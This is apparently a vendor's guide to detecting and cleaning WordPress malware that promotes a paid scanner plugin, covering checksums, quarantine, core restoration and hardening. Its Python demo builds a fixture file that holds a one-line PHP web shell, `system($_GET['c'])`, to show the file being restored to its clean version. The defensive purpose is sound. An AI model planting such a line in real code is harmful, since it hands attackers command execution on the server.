A clean WordPress install has roughly 2,000 files and a predictable hash for each one. If even one core file’s hash has changed, your site is either modified intentionally (rare) or compromised (common). This post walks through how to scan WordPress for malware properly — starting with free tools you should try first, then moving to dedicated scanners, then what to actually do when you find something.
If your site is currently down or showing spam links you didn’t add, skip to the “Triage when you confirm an infection” section. If you’re scanning preventatively, read top to bottom.
Signs your WordPress site is infected
Before any tool, eyeball check. These are the patterns we see most often:
- SEO spam in HTML. View source on your homepage. Search for words like “pharma”, “casino”, “loan”, “viagra”. If you find anchor text linking to sites you don’t recognize, especially in the footer or hidden in `<div style="display:none">` blocks, that’s spam injection.
- Sudden organic traffic drop. Check Google Search Console. If your impressions fell off a cliff and your “Security Issues” tab shows warnings, Google flagged you.
- Unexpected admin users. Users → All Users in wp-admin. Anyone with the `administrator` role you didn’t create is a takeover.
- Modified core files. This is the gold standard for detection, covered in detail below. If `wp-load.php` or `wp-config.php` has been edited since you last touched it, that’s a flag. (`wp-config.php` is not in the core checksum list, so compare it against your own last backup rather than against WordPress.org.)
- Unusual outbound traffic. Your host’s bandwidth dashboard suddenly spikes when you’re not running a campaign. Often means your site is being used to send spam or attack other sites.
- Login redirects. You try to log in and get bounced to a random URL. Common with the `siteurl` and `home` rows in `wp_options` being overwritten.
- Browser warnings. Chrome shows “Deceptive site ahead” or your hosting control panel emails you about a malware finding.
Any one of these is reason to scan immediately. Multiple signs together means you’re almost certainly compromised.
Free options to try first
We’re going to recommend our own paid tool further down. Before you spend money, run these. They’re free, they’re trustworthy, and they may catch the obvious stuff without you needing a plugin.
1. WPScan CLI
WPScan is an open-source vulnerability scanner maintained by Automattic (the company behind WordPress.com). It checks your site against a database of known vulnerable plugins, themes, and core versions. It does not directly scan files for malware — it tells you what attack surface you’re exposing.
wpscan --url https://yoursite.com --enumerate p,t,u --api-token YOUR_TOKEN
The free WPScan API tier gives you 25 requests per day, which is plenty for one-off audits. If WPScan reports vulnerable plugins, update or remove them before you do anything else.
2. Sucuri SiteCheck (free)
sitecheck.sucuri.net is a free, no-account-needed external scanner. It loads your site as a browser would, checks the rendered HTML for known malware signatures, checks blacklists (Google Safe Browsing, Norton, McAfee), and reports back in 30 seconds.
It’s not exhaustive — it can’t see PHP malware that doesn’t render to the front-end. But it catches the most common visible compromises (SEO spam, redirects, defacement, blacklist hits) and we’d be obviously dishonest not to mention it before pitching our own scanner.
3. Google Search Console
If you haven’t connected your site to Search Console, do it now. Free, takes 5 minutes. The “Security Issues” tab is the most authoritative source on whether Google considers your site compromised. If Google flagged you, no amount of plugin scanning will lift the warning until you clean the site and request a review there.
Why WordPress core checksums are the gold standard
Here’s why dedicated WordPress scanners catch things generic scanners miss: WordPress publishes canonical MD5 checksums for every core file in every released version, served from https://api.wordpress.org/core/checksums/1.0/?version=6.5&locale=en_US.
That means a proper WordPress malware scanner can:
- Download the canonical checksum list for your WP version and locale (the list is per version and per locale; a translated install has files an `en_US` list doesn’t know about).
- Hash every file the list covers on your install: the root files (`index.php`, `wp-load.php`, `wp-settings.php` and so on), `wp-admin/` and `wp-includes/`. `wp-content/` is not in the list, and neither is `wp-config.php`.
- Flag any file whose hash doesn’t match, or any file that exists in `wp-admin/` or `wp-includes/` but not in the canonical list (a backdoor file injected into core directories).
Generic malware scanners don’t do this. They pattern-match for known malware signatures, which catches commodity infections but misses targeted backdoors that don’t look like anything in their signature library.
Two caveats keep the checksum check honest. It only covers core: a backdoor dropped into a plugin, a theme or `wp-content/uploads/` never fails a core checksum, so signature and heuristic checks still matter there. And the comparison has to be made against the list fetched from api.wordpress.org on the spot, by code the attacker could not have touched; a scanner running inside an already-compromised PHP process can itself be tampered with, so when you can, verify from outside as well (WP-CLI from a shell, or a copy of the files on a clean machine).
Backdoors hidden inside core files are the hardest to find by eye. Checksum verification finds them in seconds. This is why every serious WordPress security tool — Wordfence, Sucuri, MalCare, and ours — implements it.
Our approach: BD Malware Cleaner
BD Malware Cleaner does five things:
- WordPress core checksum verification against the wp.org canonical list.
- Signature scanning against 50+ malware patterns (eval-base64 chains, web shells, SEO spam injectors, etc.).
- PHP-in-uploads detection — any `.php` file in `wp-content/uploads/` is almost always malicious.
- Double-extension detection — files like `invoice.pdf.php` that try to disguise themselves.
- World-writable file warnings — files with `0777` permissions that an attacker could overwrite.
The scanner runs in chunked AJAX — 50 files per chunk in the UI, 200 per chunk via cron — for the same reason our backup plugin does: shared hosts kill long-running PHP. A monolithic scan of a 5,000-file WordPress install times out. A chunked scan finishes. Findings go to a quarantine system: suspicious files are moved (not deleted) to wp-content/uploads/bdmc-quarantine/ with restore metadata, so you can recover anything we flagged in error.
$49/year per site. Same as the rest of the catalog. 30-day refund.
Step-by-step: scan a site for malware
We’ll assume you’ve already tried the free options above. This section is what to do with BD Malware Cleaner installed. If you’re using a different scanner the order is similar.
Step 1 — Install BD Malware Cleaner
WP Admin → Plugins → Add New → upload the plugin zip from your purchase email. Activate. The plugin adds a “BD Malware” menu item in the WP admin sidebar.
Step 2 — Run a full scan
BD Malware → Scan → Run Full Scan. The scanner kicks off chunked AJAX requests. Watch the progress bar — for a typical site (~3,000 files) it completes in 2–5 minutes. Don’t navigate away from the page; if you do, the scan pauses (it’ll resume when you return).
Step 3 — Review findings
When the scan finishes, results appear in three categories:
- Modified core files — anything whose hash doesn’t match wp.org canonical. Always investigate.
- Suspicious files — pattern-matched malware. High confidence usually means real malware; lower confidence sometimes catches legitimate caching or optimization plugins.
- Warnings — PHP in uploads, double extensions, world-writable files. Each one is a flag for human review, not necessarily malware.
For each finding, the plugin shows the file path, the snippet that matched, and a confidence score. Click “View” to see the full context before you act.
Step 4 — Quarantine, don’t delete
For any file you’re confident is malicious: click “Quarantine”. The file moves to wp-content/uploads/bdmc-quarantine/ with a timestamp and the original path stored. Your live site is now clean of that file. If you discover later that you quarantined something you shouldn’t have, you can restore it from the quarantine log.
One check worth making on any quarantine scheme, this one included: the quarantine directory sits under `wp-content/uploads/`, which the web server serves. A quarantined `.php` that is still reachable by URL and still executable has been moved, not neutralized. Confirm that PHP execution is denied in that directory (or that quarantined files are stored under a non-executable name) before you consider the file dealt with.
Don’t delete quarantined files for at least 30 days. False positives happen.
Step 5 — Restore modified core files
For any core file that fails checksum: replace it with the canonical version from WordPress.org. Never patch the file by hand, and don’t take a copy from another site. The simplest method:
- Download the zip for exactly the version (and locale) your site runs from wordpress.org. The version is in `wp-includes/version.php`.
- Replace the modified file with the one from the canonical zip via SFTP or your host’s file manager.
- Re-run the scan to confirm the file now passes checksum.
If many core files fail, reinstalling core wholesale is faster than swapping files one at a time: `wp core download --force --skip-content --version=<your version>` with WP-CLI, or the “Re-install” button on Dashboard → Updates. Neither touches `wp-config.php` or `wp-content/uploads/`.
Do not edit core files manually. Replace from canonical only.
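A scripted version of this step, added here as an illustration; it is not part of BD Malware Cleaner or of WP-CLI. It assumes the layout of the official release zip (every entry under a top-level `wordpress/` folder) and a `{relative_path: md5}` map from the checksums endpoint. The zip, the checksum map and the backdoored install are all constructed in a temporary directory so the demo runs offline, and one checksum entry is deliberately for a different release to show why the restore hashes the zip copy before writing it.

```python
import hashlib
import os
import tempfile
import zipfile


def md5_bytes(data):
    return hashlib.md5(data).hexdigest()


def restore_from_canonical_zip(zip_path, install_dir, rel_paths, checksums):
    """Overwrite each rel_path under install_dir with the copy shipped in the
    official wordpress.org zip. Every entry is hashed against the checksum
    list before it is written, so a zip for the wrong version or locale (or a
    tampered download) is refused instead of quietly installed.
    Returns (restored, skipped); skipped pairs a path with the reason."""
    restored, skipped = [], []
    root = os.path.realpath(install_dir)
    with zipfile.ZipFile(zip_path) as zf:
        names = set(zf.namelist())
        for rel in rel_paths:
            entry = "wordpress/" + rel
            expected = checksums.get(rel)
            if expected is None or entry not in names:
                skipped.append((rel, "not in the canonical list or the zip"))
                continue
            data = zf.read(entry)
            if md5_bytes(data) != expected.lower():
                skipped.append((rel, "zip copy does not match the checksum list"))
                continue
            target = os.path.realpath(os.path.join(root, rel))
            if not target.startswith(root + os.sep):
                skipped.append((rel, "path escapes the install directory"))
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as f:
                f.write(data)
            restored.append(rel)
    return restored, skipped


def run_demo():
    """Constructed fixtures: a two-file 'release zip', a checksum map in which
    one entry belongs to a different release, and an install whose
    version.php carries an appended backdoor."""
    good_version = b"<?php $wp_version = '6.5';\n"
    with tempfile.TemporaryDirectory() as tmp:
        zip_path = os.path.join(tmp, "wordpress-6.5.zip")
        with zipfile.ZipFile(zip_path, "w") as zf:
            zf.writestr("wordpress/wp-includes/version.php", good_version)
            zf.writestr("wordpress/wp-load.php", b"<?php // 6.5 loader\n")
        checksums = {
            "wp-includes/version.php": md5_bytes(good_version),
            # deliberately the hash of a different wp-load.php: the wrong-version case
            "wp-load.php": md5_bytes(b"<?php // 6.4 loader\n"),
        }
        install = os.path.join(tmp, "site")
        os.makedirs(os.path.join(install, "wp-includes"))
        with open(os.path.join(install, "wp-includes", "version.php"), "wb") as f:
            f.write(good_version + b"if (isset($_GET['c'])) { system($_GET['c']); }\n")
        wanted = ["wp-includes/version.php", "wp-load.php", "wp-includes/ghost.php"]
        restored, skipped = restore_from_canonical_zip(zip_path, install, wanted, checksums)
        # Re-verify on disk, the same check a re-run of the scan would perform.
        with open(os.path.join(install, "wp-includes", "version.php"), "rb") as f:
            verified = md5_bytes(f.read()) == checksums["wp-includes/version.php"]
        return restored, skipped, verified


if __name__ == "__main__":
    print(run_demo())
```

The hash-before-write check is the part to keep: the failure mode it guards against is restoring files from a zip for the wrong version, which passes a casual eye and then fails the very checksum scan you were trying to clear.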
Step 6 — Change all passwords
If you found a real compromise: every admin password, every database password (in `wp-config.php`), every FTP/SFTP credential, every API key stored in WordPress. Assume everything credentialed inside that install is leaked. Also regenerate the authentication keys and salts in `wp-config.php` (a fresh set comes from https://api.wordpress.org/secret-key/1.1/salt/): that invalidates every existing login cookie for every user at once, including any session the attacker is still holding on an account whose password you didn’t think to change.
Step 7 — Restore from backup if needed
If the infection is widespread (dozens of modified files, unknown how long it’s been there, persistent reinfection after cleanup), the safest move is to restore from a clean backup taken before the infection. This is where BD Backup earns its keep — and why backup-rotation matters. If your only backup is from yesterday and the infection is two weeks old, you’re restoring an already-compromised site.
Step 8 — Schedule recurring scans
BD Malware → Settings → Schedule → Daily or Weekly. Daily is recommended for any site running e-commerce, user accounts, or any sensitive workflow. Weekly is fine for a brochure site you rarely update.
After cleanup: the hardening checklist
Cleanup without hardening means reinfection. Run through this list:
- [ ] Update WordPress core to the latest version.
- [ ] Update every plugin and theme. Vulnerabilities in outdated plugins are how most infections start.
- [ ] Delete inactive plugins and themes. A deactivated plugin can still be exploited if its files exist.
- [ ] Enforce strong passwords for admin users. BD Security Firewall has a force-strong-passwords option (12+ characters).
- [ ] Enable 2FA on every admin account. TOTP authenticator app preferred over SMS or email.
- [ ] Lockout brute-force attempts. Default in BD Security Firewall: 3 attempts, 60-minute lockout.
- [ ] Hide WP version from page source — small mitigation, helps reduce automated targeting.
- [ ] Disable XML-RPC unless you actively use it (most sites don’t).
- [ ] Disable the WordPress file editor in `wp-config.php`: `define('DISALLOW_FILE_EDIT', true);`. This prevents an attacker who gains admin access from editing PHP files through the WP UI. It does not stop them uploading a plugin zip; `define('DISALLOW_FILE_MODS', true);` closes that too, at the cost of blocking updates from the dashboard.
- [ ] Block PHP execution in uploads. Either via `.htaccess` in `wp-content/uploads/` or through BD Security Firewall’s PHP-uploads block. `.htaccess` rules only take effect on Apache and LiteSpeed; on nginx the equivalent rule goes in the server block.
- [ ] Geo-block countries you don’t do business with — if your customers are US-only, blocking RU/CN/KP shrinks your attack surface meaningfully. It cuts scanner noise rather than stopping a determined attacker, who will come through a proxy in an allowed country.
- [ ] Run scheduled backups daily (or every 6 hours for high-change sites). Test a restore quarterly.
This isn’t all WordPress security. It’s the realistic minimum.
Triage when you confirm an infection
If you found malware right now and you’re reading this in panic mode, here’s the abbreviated version:
- Take the site offline temporarily — maintenance mode plugin or `.htaccess` IP whitelist.
- Change your hosting and WordPress admin passwords immediately.
- Take a fresh backup of the compromised state (forensic record, in case you need it).
- Run BD Malware Cleaner full scan, quarantine all high-confidence findings.
- Restore modified core files from canonical.
- If infection is widespread, restore from the most recent known-clean backup.
- Apply the hardening checklist above before taking the site back online.
- If your traffic dropped because Google flagged you, request review in Search Console once clean.
FAQ
Can I scan WordPress for malware without a plugin?
Yes. Sucuri SiteCheck (free, web-based) catches visible infections. WPScan CLI catches vulnerable plugins. Manual WordPress core checksum comparison is possible with `wp core verify-checksums` if you have WP-CLI installed, and `wp plugin verify-checksums --all` does the same for plugins installed from the wordpress.org directory. These cover most cases. Dedicated scanner plugins catch what’s hidden in PHP that doesn’t render to the browser.
What’s the difference between malware scanning and a firewall?
A firewall blocks attacks before they succeed. A scanner finds malware after a successful attack. You want both. The firewall reduces the chance of infection; the scanner catches what got through. Running a scanner without a firewall is reactive only — you’ll be cleaning up the same kind of compromise repeatedly.
How often should I scan?
Daily for e-commerce, membership, or any site handling user data. Weekly for content sites and blogs. After any plugin or theme installation, run a scan regardless of schedule.
What if the scanner finds a false positive?
Quarantine, don’t delete. BD Malware Cleaner moves flagged files to a quarantine folder with restore metadata. If the file turns out to be legitimate (a caching plugin’s encoded file, for example), you restore from quarantine in one click. Keep quarantined files for at least 30 days.
Will scanning slow down my site?
A scheduled scan during low-traffic hours has minimal user-facing impact. BD Malware Cleaner’s chunked scanner is designed not to spike memory or CPU. If your host emails you about resource usage during scans, reduce the chunk size or schedule scans weekly instead of daily.
My host says they scan for malware. Why do I need a plugin?
Host-level scanning typically finds commodity malware and known-bad files. It rarely catches modified WordPress core files (because hosts don’t have your specific WP version checksum context) or backdoors hidden in plugin code. Host scanning + WordPress-aware plugin scanning together is the realistic standard.